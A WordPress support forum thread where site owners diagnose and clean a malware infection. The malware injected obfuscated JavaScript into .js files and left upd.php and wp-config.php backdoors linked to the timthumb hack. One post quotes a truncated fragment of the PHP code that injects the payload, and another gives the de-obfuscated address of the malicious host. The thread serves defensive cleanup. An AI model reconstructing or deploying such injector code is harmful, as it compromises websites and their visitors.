Malware Detected by Chrome (46 posts)

  1. dionsis
    Posted 4 years ago #

    MickeyRoush wrote:
    Malwarebytes and SuperAntiSpyware.

    Cheers Mickey

    Fellowito wrote:
    @redleg-too anyway, maybe u have found the code, but where is it? I mean, I've replaced a lot of .js files, but I still have the problem. In what files are that code?

    Replacing a lot isn't enough. It needs to be every JS file. That means a fresh copy of the WP-ADMIN and WP-INCLUDES (delete the entire folders unless you've customised) then in WP-CONTENT you need to reinstall plugins and clean any JS your theme is using.

    Double check all folders 755 and files 644 permission etc etc as per links already given above

  2. fellowito
    Posted 4 years ago #

    I think I've found something.

    The file upd.php in wp-content is detected as a trojan. It's not in wordpress file, Can I delete it? I've opened it, this is its content:

    [Code moderated as per the Forum Rules. Please use the pastebin]

  3. dionsis
    Posted 4 years ago #

    Unless upd.php is a file you use in a plugin or theme, then I would remove it.

    If it is a plugin or theme file, get a clean one.

  4. phil_denton
    Posted 4 years ago #

    It probably varies based on the (infected) site. I used http://sitecheck.sucuri.net/scanner/ to tell me exactly which files were infected. In every case it was the last line of the file that had that nasty hex-javascript junk.

    Oops sorry, this reply was REALLY late.

  5. fellowito
    Posted 4 years ago #

    This has no sense.

    I've deleted upd.php. It was in wp-content and wp-admin.

    Besides, I've downloaded folders wp-admin, wp-content and wp-includes, and then, I've look of "var _0x80d0=["\x64\" in every files with dreamweaver and there weres no matches.

    This has no sense. The malware only appears in my admin panel when I activate addthis plugin, which I've deleted and uploaded again several times...

  6. MickeyRoush
    Posted 4 years ago #

    @ fellowito

    upd.php was a known malicious file with the timthumb hack. Make sure that if any of your plugins or theme uses timthumb or a variant thereof, that it is updated/patched.

  7. redleg-too
    Posted 4 years ago #

    @fellowito, Take a look at the contents of the js file


    This is the end of the legitimate code in the file


    everything after that starting with

    var _0xa687= is the malicious part.

  8. rftreyes
    Posted 4 years ago #

    We saw the malware in two plugins:

    Shareaholic and Mini Fancybox

    I deleted those files and did not install it anymore since it may trigger it again.

    Just in case this helps

  9. redleg-too
    Posted 4 years ago #

    @fellowito Another question -- The script at the bottom of


    de-obfuscates to http:// 31 . 184 . 242 . 103/s.php .103 not .102

    but the warning you are getting still says ??

  10. jmtucu
    Posted 4 years ago #

    I've the same problem, my IDS detect the attack

    set_time_limit(0); function modify($fname){ $tmp = file_get_contents($fname); $pos = strpos($tmp,'var _0xa687=["\x74\x6F\x4C'); if ($pos === false){ $code = 'var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x...

    You have to clean all the js files of your wordpress installation. Also, you need to check the wp-config.php, the virus add a backdoor at the end of the file.
    I'm still looking a best solution to this...
    It's a WordPress security issue?

  11. fellowito
    Posted 4 years ago #

    @redleg-too thanks.

    I think now it's solved.

    I had to delete folders wp-admin and wp-include, and uploaded them again.

    I had to replace every javascript file that were in wp-content (plugins and theme).

    There should be some kind of plugin to detect what file are infected or something, because antivirus plugin didn't detect this.

  12. NickStarr
    Posted 4 years ago #

    How long after cleaning all the files does the malware warning go away?

    I deleted the wp-admin and wp-include and cleaned every theme and plugin .js file, yet I'm still getting the warning.

  13. Praan
    Posted 4 years ago #

    I also have a WP site with this hack.

    At least 200 .js files where infected. I first cleaned all of these files.

    After four days it was all back.

    Now I have cleaned it also adjusted the wp-config.php and deleted the upd.php in the wp-admin and wp-content folder.

    I also saw a folder backup-b1b2f in the wp-content folder with an empty index.php.

    I am looking into the files on a daily basis. I will keep you posted.

  14. Praan
    Posted 4 years ago #

    These are the possible infected themes:

    I also updated TimThumb but thise site provides some extra info on preventing remote download:


  15. bOUL4
    Posted 4 years ago #


    I also have this problem with my site suomilacrosse.com. I replaced all JS files with fresh ones and did multiple site security checks afterwards with clean results. I made a reconsideration request for Google for which I received the answer that "No manual spam actions found". However when visiting my site with Chrome visitors still get the "malware detected" alert and some have said their antivirus software alert when visiting the site.

    Any help? :/

  16. Praan
    Posted 4 years ago #

    did you check the wp-configuration and the wp-contents and wp-admin folder for a suspicious upd.php? If your theme uses timthumb also check the link aboute in preventing remote download.

Topic Closed

This topic has been closed to new replies.

About this Topic